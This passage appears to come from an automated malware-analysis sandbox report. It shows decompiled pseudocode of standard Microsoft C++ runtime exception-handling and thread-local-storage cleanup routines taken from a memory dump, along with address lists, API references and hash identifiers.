								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6EA9EBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6EA9EB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6EA9F676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6EAA1C23(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6EA9F3B1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6EA9F3B1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6EA9F3B1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6EA9F3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6EA9EB2A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6EA9F676(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6EA9F131(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6EA9F3B1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6EAA0105(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6EA9F3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6EA9F3B1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6EA9F3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6EA9F3B1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6EAA0105(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6EAA1BCC(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6EA9FD99( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6eade0c0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6EA9F131(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6EA9FD81( &_v64);
											E6EA9E95C( &_v64, 0x6eadb17c);
											L63:
											 *(E6EA9F3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6EA9F3B1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6EA9ED1D(_t279, _t319, _t274);
											E6EAA0005(_a8, _a16, _t305);
											_t235 = E6EAA01C2(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6EA9FF7C(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6ea9f6f6
0x6ea9f6fd
0x6ea9f6ff
0x6ea9f708
0x6ea9f70e
0x6ea9f716
0x6ea9f718
0x6ea9f71b
0x6ea9f721
0x6ea9fa9a
0x6ea9fa9a
0x6ea9fa9f
0x6ea9faa1
0x6ea9faa3
0x6ea9faa6
0x6ea9faa7
0x6ea9faaa
0x6ea9fab0
0x6ea9fbcf
0x6ea9fab6
0x6ea9fab6
0x6ea9fab7
0x6ea9fab8
0x6ea9fabf
0x6ea9fac2
0x6ea9fac5
0x6ea9facb
0x6ea9facd
0x6ea9fad2
0x6ea9fad5
0x6ea9fad7
0x6ea9fadd
0x6ea9fadf
0x6ea9fae5
0x6ea9fafa
0x6ea9faff
0x6ea9fb02
0x6ea9fb04
0x6ea9fbcb
0x00000000
0x6ea9fbcc
0x6ea9fb04
0x6ea9fae5
0x6ea9fadd
0x6ea9fad5
0x6ea9fb0a
0x6ea9fb0d
0x6ea9fb10
0x6ea9fb13
0x6ea9fb16
0x6ea9fb1c
0x6ea9fb2e
0x6ea9fb33
0x6ea9fb36
0x6ea9fb39
0x6ea9fb3c
0x6ea9fb3f
0x6ea9fb42
0x6ea9fb45
0x00000000
0x00000000
0x6ea9fb4b
0x6ea9fb4b
0x6ea9fb4e
0x6ea9fb51
0x6ea9fb60
0x6ea9fb61
0x6ea9fb61
0x6ea9fb63
0x6ea9fb66
0x00000000
0x00000000
0x6ea9fb68
0x6ea9fb6b
0x00000000
0x00000000
0x6ea9fb79
0x6ea9fb7b
0x6ea9fb7e
0x6ea9fb80
0x6ea9fb88
0x6ea9fb88
0x6ea9fb8b
0x6ea9fb8d
0x6ea9fb8f
0x6ea9fbab
0x6ea9fbb0
0x6ea9fbb3
0x6ea9fbb3
0x00000000
0x6ea9fb8b
0x6ea9fb82
0x6ea9fb86
0x00000000
0x00000000
0x00000000
0x6ea9fbb6
0x6ea9fbb9
0x6ea9fbba
0x6ea9fbbd
0x6ea9fbc0
0x6ea9fbc3
0x6ea9fbc6
0x6ea9fbc6
0x00000000
0x6ea9fb51
0x6ea9fbd0
0x6ea9fbd5
0x6ea9fbd6
0x6ea9fbd9
0x6ea9fbdc
0x6ea9fbdd
0x6ea9fbde
0x6ea9fbdf
0x6ea9fbe2
0x6ea9fbe4
0x6ea9fc5c
0x6ea9fc5e
0x6ea9fc5e
0x6ea9fbe6
0x6ea9fbe6
0x6ea9fbe9
0x6ea9fbec
0x00000000
0x6ea9fbee
0x6ea9fbee
0x6ea9fbf1
0x6ea9fbf4
0x6ea9fbfb
0x6ea9fbfb
0x6ea9fbfe
0x6ea9fc00
0x6ea9fc02
0x6ea9fc34
0x6ea9fc34
0x6ea9fc37
0x6ea9fc3e
0x6ea9fc3e
0x6ea9fc41
0x6ea9fc44
0x6ea9fc4b
0x6ea9fc4b
0x6ea9fc4e
0x6ea9fc55
0x6ea9fc57
0x6ea9fc57
0x6ea9fc50
0x6ea9fc50
0x6ea9fc53
0x00000000
0x00000000
0x6ea9fc53
0x6ea9fc46
0x6ea9fc46
0x6ea9fc49
0x00000000
0x00000000
0x6ea9fc49
0x6ea9fc39
0x6ea9fc39
0x6ea9fc3c
0x00000000
0x00000000
0x6ea9fc3c
0x6ea9fc58
0x6ea9fc04
0x6ea9fc04
0x6ea9fc04
0x6ea9fc07
0x6ea9fc07
0x6ea9fc09
0x6ea9fc0b
0x00000000
0x00000000
0x6ea9fc0d
0x6ea9fc0f
0x6ea9fc23
0x6ea9fc23
0x6ea9fc11
0x6ea9fc11
0x6ea9fc14
0x6ea9fc17
0x00000000
0x6ea9fc19
0x6ea9fc19
0x6ea9fc1c
0x6ea9fc1f
0x6ea9fc21
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea9fc21
0x6ea9fc17
0x6ea9fc2c
0x6ea9fc2c
0x6ea9fc2e
0x00000000
0x6ea9fc30
0x6ea9fc30
0x6ea9fc30
0x00000000
0x6ea9fc2e
0x6ea9fc27
0x6ea9fc29
0x6ea9fc29
0x00000000
0x6ea9fc29
0x6ea9fbf6
0x6ea9fbf6
0x6ea9fbf9
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea9fbf9
0x6ea9fbf4
0x6ea9fbec
0x6ea9fc5f
0x6ea9fc63
0x6ea9fc63
0x6ea9f730
0x6ea9f730
0x6ea9f739
0x6ea9f836
0x6ea9f836
0x6ea9f839
0x00000000
0x6ea9f768
0x6ea9f768
0x6ea9f76d
0x00000000
0x6ea9f773
0x6ea9f773
0x6ea9f77b
0x6ea9fa34
0x6ea9fa38
0x6ea9f781
0x6ea9f786
0x6ea9f789
0x6ea9f78e
0x6ea9f795
0x6ea9f79a
0x00000000
0x6ea9f7d2
0x6ea9f7da
0x6ea9f83e
0x6ea9f83e
0x6ea9f841
0x6ea9f844
0x6ea9f846
0x6ea9f849
0x6ea9f84c
0x6ea9f852
0x6ea9fa03
0x6ea9fa03
0x6ea9fa06
0x00000000
0x6ea9fa08
0x6ea9fa08
0x6ea9fa0b
0x00000000
0x6ea9fa11
0x6ea9fa11
0x6ea9fa14
0x6ea9fa17
0x6ea9fa18
0x6ea9fa19
0x6ea9fa1c
0x6ea9fa1d
0x6ea9fa20
0x6ea9fa21
0x6ea9fa26
0x00000000
0x6ea9fa26
0x6ea9fa0b
0x6ea9f858
0x6ea9f858
0x6ea9f85c
0x00000000
0x6ea9f862
0x6ea9f862
0x6ea9f869
0x6ea9f881
0x6ea9f881
0x6ea9f884
0x6ea9f887
0x6ea9f88d
0x6ea9f89d
0x6ea9f8a2
0x6ea9f8a5
0x6ea9f8a8
0x6ea9f8ab
0x6ea9f8ae
0x6ea9f8b1
0x6ea9f8b4
0x6ea9f8ba
0x6ea9f8ba
0x6ea9f8bd
0x6ea9f8c0
0x6ea9f8cf
0x6ea9f8d0
0x6ea9f8d0
0x6ea9f8d2
0x6ea9f8d5
0x6ea9f8db
0x6ea9f8de
0x6ea9f8e4
0x6ea9f8e6
0x6ea9f8e9
0x6ea9f8ec
0x6ea9f8f5
0x6ea9f8f8
0x6ea9f8fa
0x6ea9f8fa
0x6ea9f8fd
0x6ea9f900
0x6ea9f903
0x6ea9f906
0x6ea9f909
0x6ea9f90e
0x6ea9f90f
0x6ea9f910
0x6ea9f911
0x6ea9f912
0x6ea9f915
0x6ea9f917
0x6ea9f919
0x00000000
0x6ea9f91b
0x6ea9f91b
0x6ea9f91b
0x6ea9f91e
0x6ea9f921
0x6ea9f923
0x6ea9f924
0x6ea9f929
0x6ea9f92c
0x6ea9f92e
0x00000000
0x00000000
0x6ea9f930
0x6ea9f931
0x6ea9f934
0x6ea9f936
0x00000000
0x6ea9f938
0x6ea9f938
0x6ea9f93b
0x6ea9f93e
0x00000000
0x6ea9f93e
0x00000000
0x6ea9f936
0x6ea9f952
0x6ea9f958
0x6ea9f975
0x6ea9f97a
0x6ea9f97a
0x6ea9f97d
0x6ea9f97d
0x00000000
0x6ea9f941
0x6ea9f941
0x6ea9f942
0x6ea9f945
0x6ea9f948
0x6ea9f94b
0x6ea9f94b
0x00000000
0x6ea9f950
0x6ea9f8ec
0x6ea9f8de
0x6ea9f980
0x6ea9f983
0x6ea9f984
0x6ea9f987
0x6ea9f98a
0x6ea9f98d
0x6ea9f990
0x6ea9f990
0x6ea9f999
0x6ea9f99c
0x6ea9f99c
0x6ea9f8b4
0x6ea9f99f
0x6ea9f9a3
0x6ea9f9a5
0x6ea9f9a8
0x6ea9f9ae
0x6ea9f9ae
0x6ea9f9b6
0x6ea9f9bb
0x6ea9fa29
0x6ea9fa29
0x6ea9fa2e
0x6ea9fa32
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea9f9bd
0x6ea9f9bd
0x6ea9f9c1
0x6ea9f9d3
0x6ea9f9d6
0x6ea9f9d9
0x6ea9f9db
0x6ea9f9f2
0x6ea9f9f6
0x6ea9f9fc
0x6ea9f9fd
0x6ea9f9ff
0x00000000
0x6ea9fa01
0x00000000
0x6ea9fa01
0x6ea9f9dd
0x6ea9f9e2
0x6ea9f9e5
0x6ea9f9ea
0x6ea9f9ed
0x00000000
0x6ea9f9ed
0x6ea9f9c3
0x6ea9f9c6
0x6ea9f9c9
0x6ea9f9cb
0x00000000
0x6ea9f9cd
0x6ea9f9cd
0x6ea9f9d1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea9f9d1
0x6ea9f9cb
0x6ea9f9c1
0x6ea9f86b
0x6ea9f86b
0x6ea9f872
0x00000000
0x6ea9f874
0x6ea9f874
0x6ea9f87b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea9f87b
0x6ea9f872
0x6ea9f869
0x6ea9f85c
0x6ea9f7dc
0x6ea9f7e4
0x6ea9f7e7
0x6ea9f7ec
0x6ea9f7f0
0x6ea9f7f3
0x6ea9f7f9
0x6ea9f7fc
0x00000000
0x6ea9f7fe
0x6ea9f7fe
0x6ea9f801
0x6ea9f803
0x6ea9fa39
0x6ea9fa39
0x00000000
0x6ea9f809
0x6ea9f811
0x6ea9f81c
0x00000000
0x00000000
0x6ea9f825
0x6ea9f828
0x6ea9f829
0x6ea9f82c
0x6ea9f82e
0x00000000
0x6ea9f834
0x00000000
0x6ea9f834
0x00000000
0x6ea9f82e
0x6ea9f809
0x6ea9fa3e
0x6ea9fa3e
0x6ea9fa40
0x6ea9fa41
0x6ea9fa48
0x6ea9fa4b
0x6ea9fa59
0x6ea9fa5e
0x6ea9fa63
0x6ea9fa66
0x6ea9fa6b
0x6ea9fa6e
0x6ea9fa71
0x6ea9fa73
0x6ea9fa75
0x6ea9fa75
0x6ea9fa7a
0x6ea9fa86
0x6ea9fa8c
0x6ea9fa91
0x6ea9fa94
0x6ea9fa95
0x00000000
0x6ea9fa95
0x6ea9f7fc
0x6ea9f7da
0x6ea9f79a
0x6ea9f77b
0x6ea9f76d
0x6ea9f739

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6EA9F7F3
type_info::operator==.LIBVCRUNTIME ref: 6EA9F815
___TypeMatch.LIBVCRUNTIME ref: 6EA9F924
IsInExceptionSpec.LIBVCRUNTIME ref: 6EA9F9F6
_UnwindNestedFrames.LIBCMT ref: 6EA9FA7A
CallUnexpected.LIBVCRUNTIME ref: 6EA9FA95

Strings

csm, xrefs: 6EA9F733
csm, xrefs: 6EA9F7A0
csm, xrefs: 6EA9F84C

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f3249ff0ba866166b7cdd226113bc0d67df8684557c2d707efa8b6525383de19
Instruction ID: 794c15628f9888e4671e5ca87cee3ef2edf3fb2cb84a78f183ecdb8425684a77
Opcode Fuzzy Hash: f3249ff0ba866166b7cdd226113bc0d67df8684557c2d707efa8b6525383de19
Instruction Fuzzy Hash: 16B18A7982020AEFCF44CFE5C9809AEB7F9BF04314B28455EF8106B215D734DA91EB99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C340, Relevance: 12.6, APIs: 10, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EA8C340() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6eade12c; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6eade12c; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6eade12c; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6eade12c; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6eade12c; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6eada300; // 0x70
					return _t26;
				}
			}

0x6ea8c344
0x6ea8c34b
0x6ea8c355
0x6ea8c35d
0x00000000
0x00000000
0x6ea8c369
0x6ea8c377
0x6ea8c37a
0x6ea8c37e
0x6ea8c387
0x6ea8c38e
0x6ea8c391
0x6ea8c394
0x6ea8c394
0x6ea8c370
0x6ea8c373
0x6ea8c39b
0x00000000
0x00000000
0x6ea8c3a1
0x6ea8c3a9
0x00000000
0x00000000
0x6ea8c3af
0x6ea8c3c7
0x6ea8c3ca
0x6ea8c3ce
0x6ea8c3d7
0x6ea8c3de
0x6ea8c3e1
0x6ea8c3e4
0x6ea8c3e4
0x6ea8c3c0
0x6ea8c3c3
0x6ea8c3eb
0x00000000
0x00000000
0x6ea8c3f1
0x6ea8c3f9
0x00000000
0x00000000
0x6ea8c3fb
0x6ea8c407
0x6ea8c40a
0x6ea8c40e
0x6ea8c417
0x6ea8c41e
0x6ea8c421
0x6ea8c424
0x6ea8c424
0x6ea8c400
0x6ea8c403
0x6ea8c42b
0x00000000
0x00000000
0x6ea8c42d
0x6ea8c435
0x00000000
0x00000000
0x6ea8c437
0x6ea8c447
0x6ea8c44a
0x6ea8c44e
0x6ea8c457
0x6ea8c45e
0x6ea8c461
0x6ea8c464
0x6ea8c464
0x6ea8c440
0x6ea8c443
0x6ea8c46b
0x6ea8c479
0x6ea8c484
0x6ea8c48b
0x6ea8c48f
0x6ea8c498
0x6ea8c49f
0x6ea8c4a2
0x6ea8c4a2
0x6ea8c481
0x6ea8c481
0x6ea8c484
0x00000000
0x6ea8c46d
0x6ea8c46d
0x6ea8c46d
0x6ea8c476
0x6ea8c476

APIs

TlsGetValue.KERNEL32(?), ref: 6EA8C37A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C387
TlsGetValue.KERNEL32(?), ref: 6EA8C3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C3D7
TlsGetValue.KERNEL32(?), ref: 6EA8C40A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C417
TlsGetValue.KERNEL32(?), ref: 6EA8C44A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C457
TlsGetValue.KERNEL32(?), ref: 6EA8C48B
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C498

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4a5ec8738aaf4831b10f7eb8dd41713b78ab8ba6797181c32c67b3585abf6e79
